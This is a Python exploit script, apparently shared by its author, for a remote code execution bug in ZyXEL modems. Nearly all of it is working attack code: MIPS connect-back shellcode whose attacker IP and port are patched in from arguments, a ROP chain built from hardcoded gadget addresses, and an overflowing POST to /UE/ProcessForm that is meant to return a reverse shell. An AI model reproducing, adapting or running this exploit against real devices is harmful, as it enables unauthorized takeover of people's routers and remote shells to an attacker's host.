#!/usr/bin/python # # ---------------------------------------------------------------------------- # "THE BLASTY-WAREZ LICENSE" (Revision 1): # wrote this file. As long as you retain this notice and don't # sell my work you can do whatever you want with this stuff. If we meet some # day, and you think this stuff is worth it, you can intoxicate me in return. # ---------------------------------------------------------------------------- # # # old code, didnt cleanup .. but some people keep asking about it. # the (targeted) RCE exploit for those ZyXEL modem thingies.. ;-] # # co-authored by xyrex somewhere in 2012(?) # # enjoy! # # -- blasty # import sys from struct import pack import socket # 168 byte connectback shellcode (port: 31337) shellcode = "\x24\x0f\xff\xfd\x01\xe0\x20\x27\x01\xe0\x28\x27\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\xaf\xa2\xff\xff\x8f\xa4\xff\xff\x24\x0f\xff\xfd\x01\xe0\x78\x27\xaf\xaf\xff\xe0\x3c\x0e\xba\xbe\x35\xce\x7a\x69\xaf\xae\xff\xe4\x3c\x0d\xc0\xde\x35\xad\xbe\xef\xaf\xad\xff\xe6\x23\xa5\xff\xe2\x24\x0c\xff\xef\x01\x80\x30\x27\x24\x02\x10\x4a\x01\x01\x01\x0c\x24\x0f\xff\xfd\x01\xe0\x28\x27\x8f\xa4\xff\xff\x24\x02\x0f\xdf\x01\x01\x01\x0c\x20\xa5\xff\xff\x24\x01\xff\xff\x14\xa1\xff\xfb\x28\x06\xff\xff\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xf4\x3c\x0e\x6e\x2f\x35\xce\x73\x68\xaf\xae\xff\xf8\xaf\xa0\xff\xfc\x27\xa4\xff\xf4\x28\x05\xff\xff\x24\x02\x0f\xab\x01\x01\x01\x0c" if len(sys.argv) != 5: print "usage: %s host port connectbackip connectbackport" % sys.argv[0] exit(0) victim = (sys.argv[1], int(sys.argv[2])) ipp = sys.argv[3].split(".") # ip_hi = c0de shellcode = shellcode.replace("\xc0\xde", chr(int(ipp[0]))+chr(int(ipp[1]))) # ip_lo = beef shellcode = shellcode.replace("\xbe\xef", chr(int(ipp[2]))+chr(int(ipp[3]))) # port = babe shellcode = shellcode.replace("\xba\xbe", pack(">H", int(sys.argv[4]))) #shellcode = "\x03\x20\x20\x21" #shellcode += "\x24\x84\x00\x18" #shellcode += "\x3c\x19\x2a\xaf" #shellcode += "\x37\x39\xb2\xfc" #shellcode += "\x03\x20\xf8\x09" #shellcode += "\x03\x20\x20\x21" #shellcode += "/bin/id" # util function def get(*s): return "".join(str(i) for i in s) def rop(s): return pack(">I", s) # gadgets gadget1 = 0x2afecd34 gadget2 = 0x2afc95c8 gadget3 = 0x2af95ae4 gadget4 = 0x2afb7628 gadget5 = 0x2afd491c sleep = 0x2afeb4e0 exit = 0x2afe96c0 printf = 0x2afb9f00 # header header = get( "POST /UE/ProcessForm HTTP/11\n", "Host: a\n", "Content-Length: 1002\n\n", "a=" ) # rop chain rop = get( "A"*40, # gadget 1 "AAAA", # $s0 rop(gadget2), # $s1 rop(gadget1), # $sp # gadget 2 - stage 1 "B"*28, "BBBB", # $s0? rop(sleep), # $s1 "BBBB", # $ra? # gadget 2 - stage 2 "D"*28, rop(gadget5), # $s0 "EEEE", # $s1 rop(gadget3), # $ra # gadget 3 "F"*28, "GGGG", # $s0 rop(gadget4), # ret in gadget 3 "H"*48, shellcode ) # connect print "[i] connecting to %s:%d" % victim s = socket.create_connection(victim, 4) # prepare payload pad = 1000 - rop.__len__() pay = rop + "Z"*pad # send payload print "[+] sending payload - %d bytes" % pay.__len__() s.send(header + pay[:1000]) # complete print "[i] you should have a shell now"